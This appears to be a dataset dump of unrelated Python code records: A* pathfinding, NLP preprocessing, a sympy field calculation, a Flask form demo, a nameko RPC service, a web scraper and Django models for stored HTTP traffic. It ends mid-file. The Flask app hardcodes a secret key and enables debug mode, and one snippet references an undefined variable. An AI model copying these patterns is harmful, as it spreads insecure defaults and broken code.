openList[openList.index(cur_node_id)]\n\t\t#当前节点添加到关闭列表\n\t\tclosedList.append(cur_node_id)\n\n\t\t#如果某个相邻格已经在开启列表里了,检查现在的这条路径是否更好。\n\t\tfor neighbor in get_neighbors_id(cur_node_id):\n\t\t\tprint('neighbor:',neighbor)\n\t\t\tif neighbor not in closedList:\n\n\t\t\t\tG_cur_to_neighbor = get_G(cur_node_id,neighbor)\n\t\t\t\tG_cur_parent = get_P_G(start_node_id,cur_node_id)\n\t\t\t\tH_neighbor = get_H(neighbor,target_node_id)\n\n\t\t\t\tif neighbor in openList:\n\t\t\t\t\tprint('in openList')\n\t\t\t\t\t#换句话说,检查如果我们用新的路径到达它的话,G值是否会更低一些。如果不是,那就什么都不做\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\tG_neighbor = get_P_G(start_node_id,neighbor)\n\n\t\t\t\t\tif G_cur_to_neighbor + G_cur_parent < G_neighbor:\t \n\n\t\t\t\t\t\tparent_node[neighbor] = cur_node_id\n\t\t\t\t\t\tNODE_LINK[start_node_id][neighbor]['parent'] = cur_node_id\n\n\t\t\t\t\t\tNODE_LINK[start_node_id][neighbor]['G'] = G_cur_to_neighbor + G_cur_parent\n\t\t\t\t\t\tNODE_LINK[start_node_id][neighbor]['H'] = H_neighbor\n\t\t\t\t\t\tNODE_LINK[start_node_id][neighbor]['F'] = NODE_LINK[start_node_id][neighbor]['G']+ NODE_LINK[start_node_id][neighbor]['H']\n\n\t\t\t\t\t\t# print('get_F',NODE_LINK[start_node_id][neighbor]['F'])\n\t\t\t\t\t\tnode_link_value[neighbor] = NODE_LINK[start_node_id][neighbor]['F']\n\t\t\t\t\telse:\n\t\t\t\t\t\t#选择当前节点\n\n\t\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\tprint('not in openList')\n\t\t\t\t\tparent_node[neighbor] = cur_node_id\n\n\t\t\t\t\tNODE_LINK[start_node_id][neighbor]['parent'] = cur_node_id\n\n\t\t\t\t\tNODE_LINK[start_node_id][neighbor]['G'] = G_cur_to_neighbor + G_cur_parent\n\t\t\t\t\tNODE_LINK[start_node_id][neighbor]['H'] = H_neighbor\n\t\t\t\t\tNODE_LINK[start_node_id][neighbor]['F'] = NODE_LINK[start_node_id][neighbor]['G']+ NODE_LINK[start_node_id][neighbor]['H']\n\n\t\t\t\t\t# print('get_F',NODE_LINK[start_node_id][neighbor]['F'])\n\n\t\t\t\t\tnode_link_value[neighbor] = NODE_LINK[start_node_id][neighbor]['F']\n\t\t\t\t\n\t\t\t\t\topenList.append(neighbor)\n\n\t\t\t# print('openList',openList)\n\t\t# print('node_link_value:',node_link_value)\n\t\t#按照得分��序\n\t\tnode_link_sorted = sorted(node_link_value.items(), key=lambda x: x[1])\n\t\t#选择分数最小的\n\t\t\n\t\tmove_node = node_link_sorted[0]\n\t\t# print('move_node',move_node)\n\t\t#获取id\n\t\tcur_node_id = move_node[0]\n\t\tprint('cur_node_id',cur_node_id)\n\treturn route\n\n\ndef get_neighbors_id(cur_node_id):\n\tnode_link =[]\n\tnode_link_arr = NODE_LINK[cur_node_id]\n\t#找到与当前节点连接的节点\n\tfor item in node_link_arr:\n\t\t# print(item)\n\t\tif item['link']!= 0:\n\t\t\tnext_node_id = node_link_arr.index(item)\n\t\t\tnode_link.append(next_node_id)\n\t# print('cur_node_id:',cur_node_id,'neighbors_id:',node_link)\n\treturn node_link\n\n\n#当前节点周围某一个节点到最初节点的实际距离\ndef get_P_G(start_node_id,link_node_id):\n\n\t# print('get_P_G',NODE_LINK[start_node_id][link_node_id]['G'])\n\treturn NODE_LINK[start_node_id][link_node_id]['G']\n\n#当前节点和周围某一个节点的实际距离\ndef get_G(cur_node_id,link_node_id):\n\t# global start_node_id\n\t# print('get_G',NODE_LINK[cur_node_id][link_node_id]['G'])\n\n\treturn NODE_LINK[cur_node_id][link_node_id]['G']\n#估计距离 欧式距离\ndef get_H(cur_node_id,target_node_id):\n\t# global start_node_id\n\t# TODO 要提前计算两点距离\n\tdict_node_by_id = sorted(dict_node.items(), key=lambda x: x[1]['id'])\n\tcur_node_coord = dict_node_by_id[cur_node_id][1]['coord']\n\ttarget_node_coord = dict_node_by_id[target_node_id][1]['coord']\n\t# ,cur_node_id,target_node_id,\n\t# print('get_H',calDistance(cur_node_coord,target_node_coord))\n\treturn calDistance(cur_node_coord,target_node_coord)\n\t# return NODE_LINK[cur_node_id][target_node_id]['H']\n\ndef get_F(cur_node_id,link_node_id):\n\tglobal target_node_id\n\treturn get_G(cur_node_id,link_node_id)+get_H(cur_node_id,target_node_id)\n\n\n\n\ndef getRouteLabel(start_node_id,route):\n\tdict_node_by_id = sorted(dict_node.items(), key=lambda x: x[1]['id'])\n\trouteLabel = []\n\t# print('start_node_id',start_node_id,'route:',route)\n\tfor i in route:\n\t\t# print('NODE_LINK',NODE_LINK[start_node_id][i])\n\n\t\tlabel = dict_node_by_id[i][0]\n\t\trouteLabel.append(label)\n\treturn routeLabel\n\n\ndef getRoute(start_node_id,target_node_id):\n\t# closedList\n\t# for i in closedList:\n\t# print(start_node_id,target_node_id)\n\t# print('parent_node',parent_node)\n\n\tfound_route = False\n\troute_node_id = target_node_id\n\n\troute = [target_node_id]\n\troute_dis = NODE_LINK[start_node_id][target_node_id]['G']\n\t# print('NODE_LINK_getRoute',NODE_LINK[start_node_id])\n\twhile not found_route:\n\t\t\n\t\troute_node_id = parent_node[route_node_id]\n\n\t\t\n\n\t\troute.append(route_node_id)\n\n\t\tif int(start_node_id) == int(route_node_id):\n\t\t\t# print('fuck')\n\t\t\tfound_route = True\n\n\n\t# print('getRoute',,'dis',route_dis)\n\n\tresRoute = {'route':getRouteLabel(start_node_id,route),'route_dis':route_dis}\n\treturn resRoute \n\t# NODE_LINK[]\n\n\n\n# print(np.shape(np.array(init_dict_node())))\n\n# print(np.shape(np.array(init_dict_node())[:,1]))\n# print(np.array(init_dict_node())[:,0])\n# print(init_dict_node())\n# def aStar(startNode,targetNode,NODE_LINK,NODE_LINK_DISTANCE):\ndef getAllNodeDis():\n\tdict_node_by_id = sorted(dict_node.items(), key=lambda x: x[1]['id'])\n\tAllNodeDisArr = []\n\tAllNodeDis = {}\n\tfor i in range(len(dict_node_by_id)-4):\n\t# for item in dict_node_by_id:\n\t\t\n\t\tlable = dict_node_by_id[i][0]\n\t\tdis = []\n\t\tfor td in ['td_1','td_2','td_3','td_4']:\n\t\t\tdis_td = astar(lable,td)\n\t\t\tprint('lable',lable,'td',td,'aStar',dis_td)\n\t\t\tdis.append(dis_td)\n\n\t\tAllNodeDis[lable] = dis\n\t\tAllNodeDisArr.append(dis)\n\t# print('AllNodeDis',AllNodeDis)\n\n\tprint('AllNodeDis',len(AllNodeDis),np.shape(AllNodeDisArr))\n\n\treturn AllNodeDis\n\n#得到所有节点到四个出口的最短路径\ngetAllNodeDis()\n\n\n\n\n\n\n\n\n# print()\n# dict_node_by_id = sorted(dict_node.items(), key=lambda x: x[1]['id'])\n# cur_node_coord = dict_node_by_id[1][1]['coord']\n# target_node_coord = dict_node_by_id[65][1]['coord']\n\n# print(cur_node_coord,target_node_coord)\n\n\n\n\n\n","sub_path":"astar.py","file_name":"astar.py","file_ext":"py","file_size_in_byte":11042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"371515244","text":"from tree import sentence, ST\nfrom sys import argv\nfrom subprocess import call\nimport numpy as np\nfrom attention import similar\n\nif __name__ == '__main__':\n\ttry:\n\t\tinp = open(argv[1], 'r')\n\t\toup = open(argv[2], 'r')\n\t\toutputfile = argv[3]\n\texcept:\n\t\tprint('Invalid parameters!')\n\t\texit()\n\n\tsources, targets = [], []\n\n\tcount_oup = count_inp = 0 \n\tinvalid = set()\n\n\tx, y = [], []\n\tfor l in inp:\n\t\tif l[0] == '\\n':\n\t\t\tfor i in x:\n\t\t\t\ty += [sentence(i[1])]\n\t\t\tfor i in range(len(x)):\n\t\t\t\tp = x[i]\n\t\t\t\tif p[6]:\n\t\t\t\t\ty[i].set_dep(p[7], y[p[6] - 1], i < p[6] - 1)\n\t\t\t\telse:\n\t\t\t\t\tsources += [y[i]]\n\t\t\t\t\tcount_inp += 1\n\t\t\t\tif p[1] in '()[]\\{\\}\\/,.;\\':\"<>!@#$%^&*' and not p[6]:\n\t\t\t\t\tinvalid.add(count_inp)\n\t\t\tx, y = [], []\n\t\t\t\n\t\telse:\n\t\t\tl = l[:-1].split('\\t') #split by tabs\n\t\t\tl[1] = l[1].lower()\n\t\t\tl[0] = int(l[0])\n\t\t\tl[6] = int(l[6])\n\t\t\tx += [l]\n\n\n\tx, y = [], []\n\tfor l in oup:\n\t\tif l[0] == '\\n':\n\t\t\tfor i in x:\n\t\t\t\ty += [sentence(i[1])]\n\t\t\tfor i in range(len(x)):\n\t\t\t\tp = x[i]\n\t\t\t\tif p[6]:\n\t\t\t\t\ty[i].set_dep(p[7], y[p[6] - 1], i < p[6] - 1)\n\t\t\t\telse:\n\t\t\t\t\ttargets += [y[i]]\n\t\t\t\t\tcount_oup += 1\n\t\t\t\tif p[1] in '()[]\\{\\}\\/,.;\\':\"<>!@#$%^&*' and not p[6]:\n\t\t\t\t\tinvalid.add(count_oup)\n\t\t\tx, y = [], []\n\t\t\t\n\t\telse:\n\t\t\tl = l[:-1].split('\\t') #split by tabs\n\t\t\tl[1] = l[1].lower()\n\t\t\tl[0] = int(l[0])\n\t\t\tl[6] = int(l[6])\n\t\t\tx += [l]\n\t\n\tprint('count:', count_inp,count_oup)\n\tprint('lengths:', len(sources),len(targets))\n\n\tsts = []\n\tatts = []\n\tfor i in range(len(targets)):\n\t\tif i + 1 not in invalid:\n\t\t\tst = ST(sources[i], targets[i])\n\t\t\tsts += [st]\n\t\t\tatts += st.get_att()\n\n\n\tprint('attention size:', len(atts))\n\tatts = np.array(list(atts))\n\tsim = similar(atts.T[0], atts.T[1])\n\tsim = {(atts[i, 0], atts[i, 1]): sim[i, 0]\n\t\t for i in range(sim.shape[0])}\n\n\t'''\n\t#using mini-cost maxflow to solve matching\n\tfout = open('temp_sims.txt', 'w')\n\n\tfor st in sts:\n\t\tfout.write(st.get_sim(sim) + '\\n')\n\n\tcall(['./flow', 'temp_sims.txt', '>', 'temp_results.txt'])\n\tfin = open('temp_results.txt', 'r')\n\n\tfor st in sts:\n\t\tpairs = []\n\t\twhile True:\n\t\t\tline = fin.readline()\n\t\t\tif line == '\\n':\n\t\t\t\tbreak\n\t\t\tline = line.split(' ')\n\t\t\tpairs += [(int(line[0]), int(line[1]))]\n\n\t\tif line == '\\n':\n\t\t\tcontinue\n\t\telse:\n\t\t\tst.build_corr(sim, pairs)\n\n\t'''\n\t#brute force matching approximation\n\tfor st in sts:\n\t\tst.build_corr(sim)\n\n\tphrs = []\n\tdeps = []\n\tfor st in sts:\n\t\tphr = st.phr_gen()\n\t\tdep = st.dep_gen()\n\t\tphrs += phr\n\t\tdeps += dep\n\n\tprint('phrs', len(phrs))\n\tprint('deps', len(deps))\n\n\n\tnp.save(outputfile+'_phrs.npy', phrs)\n\tnp.save(outputfile+'_deps.npy', deps)\n","sub_path":"prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"278302861","text":"import sys\n\nimport sympy as sym\nimport numpy as np\nimport scipy as sci\nimport matplotlib.pyplot as plt\nimport seaborn as sbn\nfrom sympy import Integral, Symbol\n\n#Define the symbols\nR = 1\nu = Symbol('u') #The angle theta (with respect to x-axis)\nz2 = Symbol('z2') #This is z'\nr = Symbol('r')\n\n#Define the intresting points\n#Right now I've set these at the origin\n#I could change them to whatever point I want by changing the values\nx = 0\ny = 0\nz = 0\n\n#Define the dx, dy, dz for finite difference approximation\ndx = x + 0.0001\ndy = y + 0.0001\ndz = z + 0.0001\n\n#Define the integrals for part (a)\nax1 = (-R*sym.sin(u)-y) / ((R*sym.cos(u)-x)**2 + (R*sym.sin(u)-y)**2 + (z2-z)**2)**1.5\nay1 = (R*sym.cos(u)-x) / ((R*sym.cos(u)-x)**2 + (R*sym.sin(u)-y)**2 + (z2-z)**2)**1.5\n\nAx1 = Integral(ax1*r, (r, 0, R), (u, 0, 2*sym.pi), (z2, -R, R)).doit()\nAy1 = Integral(ay1*r, (r, 0, R), (u, 0, 2*sym.pi), (z2, -R, R)).doit()\n\n#Define functions for dx in part (a)\nax1dx = (-R*sym.sin(u)-y) / ((R*sym.cos(u)-dx)**2 + (R*sym.sin(u)-y)**2 + (z2-z)**2)**1.5\nay1dx = (R*sym.cos(u)-dx) / ((R*sym.cos(u)-dx)**2 + (R*sym.sin(u)-y)**2 + (z2-z)**2)**1.5\n\nAx1dx = Integral(ax1dx*r, (r, 0, R), (u, 0, 2*sym.pi), (z2, -R, R)).doit()\nAy1dx = Integral(ay1dx*r, (r, 0, R), (u, 0, 2*sym.pi), (z2, -R, R)).doit()\n\n#Define functions for dy in part (a)\nax1dy = (-R*sym.sin(u)-dy) / ((R*sym.cos(u)-x)**2 + (R*sym.sin(u)-dy)**2 + (z2-z)**2)**1.5\nay1dy = (R*sym.cos(u)-x) / ((R*sym.cos(u)-x)**2 + (R*sym.sin(u)-dy)**2 + (z2-z)**2)**1.5\n\nAx1dy = Integral(ax1dy*r, (r, 0, R), (u, 0, 2*sym.pi), (z2, -R, R)).doit()\nAy1dy = Integral(ay1dy*r, (r, 0, R), (u, 0, 2*sym.pi), (z2, -R, R)).doit()\n\n#Define functions for dz in part (a)\nax1dz = (-R*sym.sin(u)-y) / ((R*sym.cos(u)-x)**2 + (R*sym.sin(u)-y)**2 + (z2-dz)**2)**1.5\nay1dz = (R*sym.cos(u)-x) / ((R*sym.cos(u)-x)**2 + (R*sym.sin(u)-y)**2 + (z2-dz)**2)**1.5\n\nAx1dz = Integral(ax1dz*r, (r, 0, R), (u, 0, 2*sym.pi), (z2, -R, R)).doit()\nAy1dz = Integral(ay1dz*r, (r, 0, R), (u, 0, 2*sym.pi), (z2, -R, R)).doit()\n\n#Defining the B-field for part (a)\nBx1 = (Ay1dz - Ay1)/dz\nBy1 = (Ax1dz - Ax1)/dz\nBz1 = (Ay1dx - Ay1)/dx - (Ax1dy - Ax1)/dy\n\nprint('For part (a):')\nprint(\"Bx1 = (uM / 4*.pi)*\", Bx1)\nprint(\"By1 = (uM / 4*.pi)*\", By1)\nprint(\"Bz1 = (uM / 4*.pi)*\", Bz1)\n\n\n#Define the integrals for part (b)\nax2 = (-R*sym.sin(u)) / ((R*sym.cos(u)-x)**2 + (R*sym.sin(u)-y)**2 + (z2-z)**2)**0.5\nay2 = (R*sym.cos(u)) / ((R*sym.cos(u)-x)**2 + (R*sym.sin(u)-y)**2 + (z2-z)**2)**0.5\n\nAx2 = Integral(ax2*r, (u, 0, 2*sym.pi), (z2, -R, R)).doit()\nAy2 = Integral(ay2*r, (u, 0, 2*sym.pi), (z2, -R, R)).doit()\n\n#Define functions for dx in part (b)\nax2dx = (-R*sym.sin(u)) / ((R*sym.cos(u)-dx)**2 + (R*sym.sin(u)-y)**2 + (z2-z)**2)**0.5\nay2dx = (R*sym.cos(u)) / ((R*sym.cos(u)-dx)**2 + (R*sym.sin(u)-y)**2 + (z2-z)**2)**0.5\n\nAx2dx = Integral(ax2dx*r, (u, 0, 2*sym.pi), (z2, -R, R)).doit()\nAy2dx = Integral(ay2dx*r, (u, 0, 2*sym.pi), (z2, -R, R)).doit()\n\n#Define functions for dy in part (b)\nax2dy = (-R*sym.sin(u)) / ((R*sym.cos(u)-x)**2 + (R*sym.sin(u)-dy)**2 + (z2-z)**2)**0.5\nay2dy = (R*sym.cos(u)) / ((R*sym.cos(u)-x)**2 + (R*sym.sin(u)-dy)**2 + (z2-z)**2)**0.5\n\nAx2dy = Integral(ax2dy*r, (u, 0, 2*sym.pi), (z2, -R, R)).doit()\nAy2dy = Integral(ay2dy*r, (u, 0, 2*sym.pi), (z2, -R, R)).doit()\n\n#Define functions for dz in part (b)\nax2dz = (-R*sym.sin(u)) / ((R*sym.cos(u)-x)**2 + (R*sym.sin(u)-y)**2 + (z2-dz)**2)**0.5\nay2dz = (R*sym.cos(u)) / ((R*sym.cos(u)-x)**2 + (R*sym.sin(u)-y)**2 + (z2-dz)**2)**0.5\n\nAx2dz = Integral(ax2dz*r, (u, 0, 2*sym.pi), (z2, -R, R)).doit()\nAy2dz = Integral(ay2dz*r, (u, 0, 2*sym.pi), (z2, -R, R)).doit()\n\n#Defining the B-field for part (b)\nBx2 = (Ay2dz - Ay2)/dz\nBy2 = (Ax2dz - Ax2)/dz\nBz2 = (Ay2dx - Ay2)/dx - (Ax2dy - Ax2)/dy\n\nprint('For part (b):')\nprint(\"Bx2 = (uM / 4*.pi)*\", Bx2)\nprint(\"By2 = (uM / 4*.pi)*\", By2)\nprint(\"Bz2 = (uM / 4*.pi)*\", Bz2)\n","sub_path":"A9Q6.py","file_name":"A9Q6.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"149108175","text":"from logging import debug\r\nfrom os import read\r\nfrom flask import Flask,render_template,request,session,flash\r\nimport flask\r\nfrom flask_wtf import FlaskForm\r\nfrom flask_wtf.form import _is_submitted\r\nfrom wtforms import TextField,SubmitField,BooleanField,RadioField,SelectField,TextAreaField\r\nfrom wtforms import validators\r\nfrom wtforms.validators import DataRequired\r\nfrom flask_bootstrap import Bootstrap\r\n\r\n\r\napp = Flask(__name__)\r\napp.config['SECRET_KEY'] = 'mykey'\r\nBootstrap(app)\r\n\r\n\r\nclass MyForm(FlaskForm):\r\n name = TextField(\"ป้อนชื่อของคุณ\",validators=[DataRequired()])\r\n address = TextAreaField('ป้อนที่อยู่ของคุณ',validators=[DataRequired()])\r\n isAccept = BooleanField(\"ยอมรับเงื่อนไข\",validators=[DataRequired()])\r\n gender = RadioField('gender',choices=[('male','ชาย'),('Female','หญิง'),('trans','อื่นๆ')],validators=[DataRequired()])\r\n skill = SelectField('ความสามารถ',choices=[('Python','Python'),('C++','C++'),('CSS/HTML','CSS/HTML'),('Java','Java')],validators=[DataRequired()])\r\n submit = SubmitField(\"บันทึกข้อมูล\",validators=[DataRequired()])\r\n\r\n\r\n\r\n@app.route('/',methods=['get','post'])\r\ndef index():\r\n\r\n # name = False\r\n # form = MyForm()\r\n # isAccept= False\r\n # gender = False\r\n # skill = False\r\n # address = False\r\n form = MyForm()\r\n if form.validate_on_submit():\r\n\r\n session['name']= form.name.data\r\n session['isAccept']= form.isAccept.data\r\n session['gender']= form.gender.data\r\n session['skill'] = form.skill.data\r\n session['address']= form.address.data\r\n # clearData\r\n form.name.data = \"\"\r\n form.isAccept.data = \"\"\r\n form.gender.data = \"\"\r\n form.skill.data = \"\"\r\n form.address.data = \"\"\r\n\r\n\r\n # data = {\"name\":\"Bot02\",\"age\":\"22\",\"salary\":\"150000\"}\r\n # return render_template(\"index.html\",form = form,name=name,isAccept=isAccept,gender=gender,skill=skill,address=address)\r\n return render_template(\"index.html\",form=form)\r\n\r\n\r\n\r\n@app.route('/boostarp',methods=['get','post'])\r\ndef index_boostrap():\r\n\r\n # name = False\r\n # form = MyForm()\r\n # isAccept= False\r\n # gender = False\r\n # skill = False\r\n # address = False\r\n form = MyForm()\r\n if form.validate_on_submit():\r\n\r\n flash(\"บันทึกข้อมูลเรียบร้อย\")\r\n\r\n session['name']= form.name.data\r\n session['isAccept']= form.isAccept.data\r\n session['gender']= form.gender.data\r\n session['skill'] = form.skill.data\r\n session['address']= form.address.data\r\n # clearData\r\n form.name.data = \"\"\r\n form.isAccept.data = \"\"\r\n form.gender.data = \"\"\r\n form.skill.data = \"\"\r\n form.address.data = \"\"\r\n\r\n\r\n # data = {\"name\":\"Bot02\",\"age\":\"22\",\"salary\":\"150000\"}\r\n # return render_template(\"index.html\",form = form,name=name,isAccept=isAccept,gender=gender,skill=skill,address=address)\r\n return render_template(\"index_boostrap.html\",form=form)\r\n\r\n@app.route('/about')\r\ndef about():\r\n product = [\"เสื้อผ้า\",\"เตารีด\",\"ผ้าห่ม\",\"ยาสามัญ\"]\r\n return render_template(\"about.html\",Myproduct = product)\r\n\r\n@app.route('/admin')\r\ndef admin():\r\n #ชื่อ อายุ\r\n name = \"bot01\"\r\n age = 30\r\n return render_template(\"admin.html\",Myname = name,Myage = age)\r\n\r\n@app.route('/seddata')\r\ndef sigupfrom():\r\n fname=request.args.get('fname')\r\n descriptio = request.args.get('description')\r\n return render_template('thankyou.html',data={\"name\":fname,\"description\":descriptio})\r\n\r\n# @app.route('/user//')\r\n# def member(name,age):\r\n# return \"Hello member : {} , age : {}\".format(name,age)\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)","sub_path":"flask_basic/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"509439820","text":"from nameko.rpc import rpc\nfrom nameko_mongokit.database import Document, Collection\nimport json\n\n\nclass Trade:\n name = 'trade'\n\n collection = Collection(doc_name='meihao', host='localhost', port=27017)\n orders = collection\n\n @rpc\n def get(self, data=None):\n \"\"\"\n 获取单笔交易的部分信息\n \"\"\"\n try:\n kwargs = data.get('fields')\n d = self.orders.find_one(kwargs)\n print(self.orders)\n if d is not None:\n d.pop('_id')\n result = {\n 'trade_get_response': {\n 'trade': d,\n }\n }\n return json.dumps(result)\n except Exception as e:\n result = {\n 'error_response': {\n 'sub_msg': '非法参数',\n 'code': 50,\n 'sub_code': 'isp.trade-service-failed',\n 'msg': 'Remote service error. {}'.format(e),\n }\n }\n return json.dumps(result)\n\n @rpc\n def close(self, data=None):\n result = {\n 'trade_close_response': {\n 'trade': {\n 'tid': 200,\n }\n }\n }\n return json.dumps(result)\n\n","sub_path":"v1_0/trade.py","file_name":"trade.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"141552635","text":"def freeze_prefix1(model):\n base_prefix = []\n params = [p for n, p in model.named_parameters() if not any(nd in n for nd in [\"CEFR_matrices\"])]\n for par in params:\n par.requires_grad = False\n\ndef transfer_prefix1(model,model_base):\n\n params = model.named_parameters()\n params_base_ = model_base.named_parameters()\n dict_params = dict(params)\n params_base = [(n,p) for n, p in model_base.named_parameters() if not any(nd in n for nd in base_prefix)]\n\n\n for name_base, param_base in params_base:\n dict_params[name_base].data.copy_(param_base.data)\n\n model_base.load_state_dict(dict_params)\n\n\n\n\n\n","sub_path":"transformers/GEC/transfer_weights.py","file_name":"transfer_weights.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"279911341","text":"import os\r\nimport traceback\r\n\r\n\r\n\r\nclass PathError(Exception):\r\n def __init__(self, message, code):\r\n self.message = \"PathError: \" + message\r\n self.code = code\r\n \r\n \r\ndef check_path(path):\r\n \"\"\"\r\n Check path.\r\n :param path: Input path.\r\n :return: path\r\n \"\"\"\r\n if not os.path.exists(path):\r\n raise PathError(\"directory path url %s is not exist.\" % path, 500)\r\n if not os.path.isdir(path):\r\n raise PathError(\"path url %s is not a directory.\" % path, 500)\r\n if path[-1] == \"\\\\\":\r\n path = path.strip(\"\\\\\")\r\n path = \"\\\\\" + path\r\n \r\n return path\r\n \r\n \r\ndef cd(path):\r\n \"\"\"\r\n Traverse the directory and add the file path to the list.\r\n :param path: Valid path.\r\n :return: file_list\r\n \"\"\"\r\n cd_list = os.listdir(path)\r\n file_list = []\r\n for ele in cd_list:\r\n temp_path = path + \"\\\\\" + ele\r\n if os.path.isfile(temp_path):\r\n file_list.append(temp_path)\r\n else:\r\n pre_list = cd(temp_path)\r\n file_list.extend(pre_list)\r\n return file_list\r\n \r\n \r\ndef print_files(files):\r\n \"\"\"\r\n Write path to txt file.\r\n :param files: file list.\r\n :return: \r\n \"\"\"\r\n open(\"txt_path.txt\", \"w\").write(\"\")\r\n if len(files) == 0:\r\n open(\"txt_path.txt\", \"w\",encoding='utf-8').write(\"None\")\r\n print(\"write success.\")\r\n return\r\n \r\n with open(\"txt_path.txt\", \"w\",encoding='utf-8') as txt_files:\r\n for file in files:\r\n if file[-4:]==\".txt\":\r\n txt_files.write(file + \"\\n\")\r\n txt_files.close()\r\n print(\"write success.\")\r\n return\r\n \r\n \r\n# main method\r\npath = r\"C:\\Users\\24508\\Desktop\\Resume&Job_Description\\Original_Resumes\"\r\n \r\ntry:\r\n path = check_path(path)\r\n files = cd(path)\r\n print_files(files)\r\nexcept PathError as e:\r\n print(e.message + \" errcode \" + str(e.code))\r\n print(\"errmag: \\n%s\" % traceback.format_exc())","sub_path":"MLB-GroupWork 12/Text data Extractor/path_txt.py","file_name":"path_txt.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"563618472","text":"# For all of 2013, the number of potential signals of serious risks or new\n# safety information that resulted from the FDA's FAERS\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\nbase_url = 'http://www.fda.gov'\nurl = '/Drugs/GuidanceComplianceRegulatoryInformation/Surveillance/AdverseDrugEffects/ucm082196.htm'\nr = requests.get(base_url+url)\nsoup = BeautifulSoup(r.content, 'lxml')\nlinks = [base_url+link['href'] for link in soup.find_all('a', text=re.compile(\"2013\"))]\nx = 0\nfor link in links:\n two_soup = BeautifulSoup(requests.get(link).content, 'lxml')\n rows = len(two_soup.select('tbody > tr')) - 1\n x += rows\nprint(x)\n","sub_path":"my_scripts/my_62.py","file_name":"my_62.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"272753196","text":"from logging import getLogger\n\nfrom django.db import models\nfrom django.core import validators\nfrom django.dispatch import receiver\n\nfrom raw.constants import SchemeEnum, RequestMethodEnum\nfrom utils.http import (\n RequestTypeEnum, ResponseTypeEnum,\n parse_request, parse_response,\n Request as RequestObject, Response as ResponseObject,\n headers_to_list, list_to_headers\n)\n# Create your models here.\n\n\nlogger = getLogger(\"raw\")\n\n\nclass Raw(models.Model):\n\n SCHEME = tuple([\n (enum_item.value, enum_item.name)\n for enum_item in SchemeEnum.__members__.values()\n ])\n\n scheme = models.CharField(choices=SCHEME, max_length=255)\n host = models.CharField(max_length=255)\n port = models.IntegerField(validators=[validators.MaxValueValidator(\n 65535), validators.MinValueValidator(1)])\n raw_request = models.BinaryField(max_length=5 * 1024, help_text=\"原始请求\")\n raw_response = models.BinaryField(\n max_length=1024 * 1024, null=True, blank=False, help_text=\"原始响应\")\n created_time = models.DateTimeField(auto_now_add=True)\n\n url = models.ForeignKey(\n \"Url\", on_delete=models.CASCADE, related_name=\"raws\")\n\n class Meta:\n ordering = ['-created_time', ]\n\n @property\n def request_object(self):\n return parse_request(self.scheme, self.host, self.port, self.raw_request)\n\n @property\n def response_object(self):\n if not self.raw_response:\n return None\n return parse_response(self.raw_response, self.request)\n\n @property\n def url_str(self):\n return self.request_object.url\n\n @property\n def standard_url(self):\n return self.request_object.pure_url\n\n\nclass Url(models.Model):\n\n SCHEME = tuple([\n (enum_item.value, enum_item.name)\n for enum_item in SchemeEnum.__members__.values()\n ])\n\n scheme = models.CharField(choices=SCHEME, max_length=255, editable=False)\n host = models.CharField(max_length=255, editable=False)\n port = models.IntegerField(validators=[validators.MaxValueValidator(\n 65535), validators.MinValueValidator(1)], editable=False)\n path = models.CharField(max_length=255, editable=False)\n url = models.CharField(max_length=255, editable=False, unique=True)\n suffix = models.CharField(max_length=255, editable=False)\n\n class Meta:\n ordering = ['url', ]\n\n @classmethod\n def from_request(cls, request: RequestObject):\n i, _ = cls.objects.get_or_create(\n url=request.pure_url,\n defaults=dict(\n scheme=request.scheme,\n host=request.host,\n port=request.port,\n path=request.path,\n suffix=request.suffix\n )\n )\n return i\n\n\nclass Request(models.Model):\n REQUEST_TYPE = tuple([\n (enum_item.value, enum_item.name)\n for enum_item in RequestTypeEnum.__members__.values()\n ])\n REQUEST_METHOD = tuple([\n (enum_item.value, enum_item.name)\n for enum_item in RequestMethodEnum.__members__.values()\n ])\n\n url = models.ForeignKey(\"Url\", editable=False,\n on_delete=models.CASCADE, related_name=\"requests\")\n raw = models.OneToOneField(\n \"Raw\", on_delete=models.CASCADE, related_name=\"request\")\n\n method = models.CharField(\n max_length=255,\n choices=REQUEST_METHOD,\n default=RequestMethodEnum.GET.value,\n help_text=\"请求方法\"\n )\n request_headers = models.JSONField(editable=False, help_text=\"原始请求\")\n request_body = models.BinaryField(\n max_length=5 * 1024, editable=False, help_text=\"请求 body\")\n request_type = models.CharField(\n max_length=255,\n choices=REQUEST_TYPE,\n default=RequestTypeEnum.other.value,\n help_text=\"请求类型\"\n )\n\n class Meta:\n ordering = ['url', ]\n constraints = [\n models.UniqueConstraint(\n fields=['url', 'raw'], name='unique_request')\n ]\n\n @classmethod\n def from_request(cls, url_id, raw_id, request: RequestObject, request_type: str):\n i, _ = cls.objects.get_or_create(\n url_id=url_id,\n raw_id=raw_id,\n defaults=dict(\n method=request.method,\n request_headers=headers_to_list(request.headers),\n request_body=request.content,\n request_type=request_type,\n )\n )\n return i\n\n @property\n def request(self):\n return RequestObject(\n scheme=self.url.scheme,\n host=self.url.host,\n port=self.url.port,\n path=self.url.path,\n method=self.method,\n headers=list_to_headers(self.request_headers),\n content=self.request_body,\n first_line_format=\"relative\",\n http_version=\"HTTP/1.1\"\n )\n\n\nclass Response(models.Model):\n\n RESPONSE_TYPE = tuple([\n 